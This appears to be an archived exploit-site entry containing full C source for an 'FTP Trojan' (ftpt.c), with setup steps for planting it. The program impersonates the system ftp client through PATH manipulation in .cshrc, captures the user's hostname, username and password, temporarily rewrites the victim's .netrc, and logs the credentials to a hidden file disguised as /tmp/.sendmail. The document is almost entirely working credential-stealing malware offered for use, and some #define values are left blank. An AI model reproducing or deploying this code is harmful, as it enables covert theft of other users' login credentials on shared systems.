ftp trojan logs the hostname, username, and password when the local users use the ftp.
8a3d1bd7795300d33e45002f6a46e071fbefb450870201eac7e1aeee73cf0a9c
/*==================================================================================
FTP- Trojan- ftpt Ver 1.00
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
[Setup]
1. Please change folowing #define value for your environment
#define LOGFILE
#define NETRC
<d>
%which ftp
/usr/bin/ftp <--- This is real ftp. Please specify this path to #define FTPCMD
%cc ftpt.c -o ftp <--- comple this program
%mv ftp /tmp/temp/ <--- copy this program
edit ~/.cshrc
if set path exits in .cshrc, please set path env as follows,
set path=(. /tmp/temp /usr/bin
==================================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
/* FTP Password Logfile */
#define LOGFILE "/tmp/.sendmail"
/* .netrc for target user */
#define NETRC "/home/hoge/.netrc"
/* Real FTP
*/
#define FTPCMD "/usr/bin/ftp"
#define NETRCBAK "/tmp/netrcbak"
#define TIMEOUT_V 5 /* Connection Timeout value */
#define MAX_IPLEN
#define MAX_USERNAME
#define MAX_PASSWORD
int sock;
main(argc,argv)
int argc;
char *argv[];
{
char *x;
char buf[200];
char user[MAX_USERNAME];
char pass[MAX_PASSWORD];
struct hostent *h;
FILE *fp;
void movefile();
if (argc==1){
system(FTPCMD);
exit(1);
}
if ((h=gethostbyname(argv[1]))==NULL){
printf("%s: unknown host\n",argv[1]);
system(FTPCMD);
exit(1);
}
printf("Connected to %s\n",h->h_name);
printf("220 %s FTP server ready.\n",h->h_name);
printf("Name (%s:%s): ",h->h_name,getlogin());
gets(user);
if (strlen(user)==0) strcpy(user,getlogin());
printf("331 Password required for %s\n",user);
x=getpass("Password:");
if (strlen(x)!=0) strcpy(pass,x);
else strcpy(pass,"no_pass");
movefile(NETRC,NETRCBAK);
if ((fp=fopen(NETRC,"w"))!=NULL){
fprintf(fp,"machine %s\n",h->h_name);
fprintf(fp,"login %s\n",user);
fprintf(fp,"password %s\n",pass);
fclose(fp);
sprintf(buf,"chmod go-rwx %s",NETRC);
system(buf);
}
sprintf(buf,"%s %s",FTPCMD,h->h_name);
system(buf);
movefile(NETRCBAK,NETRC);
sprintf(buf,"chmod go-rwx %s",NETRC);
system(buf);
if ((fp=fopen(LOGFILE,"a"))!=NULL){
fprintf(fp,"host=%s user=%s pass=%s\n",h->h_name,user,pass);
fclose(fp);
}
}
void movefile(f1,f2)
char *f1,*f2;
{
FILE *fp1,*fp2;
if ((fp1=fopen(f1,"rb"))==NULL) return;
if ((fp2=fopen(f2,"wb"))==NULL){
fclose(fp1);
return;
}
for(;;){
if (feof(fp1)) break;
putc(getc(fp1),fp2);
}
fclose(fp1);
fclose(fp2);
remove(f1);
}
ftpt.c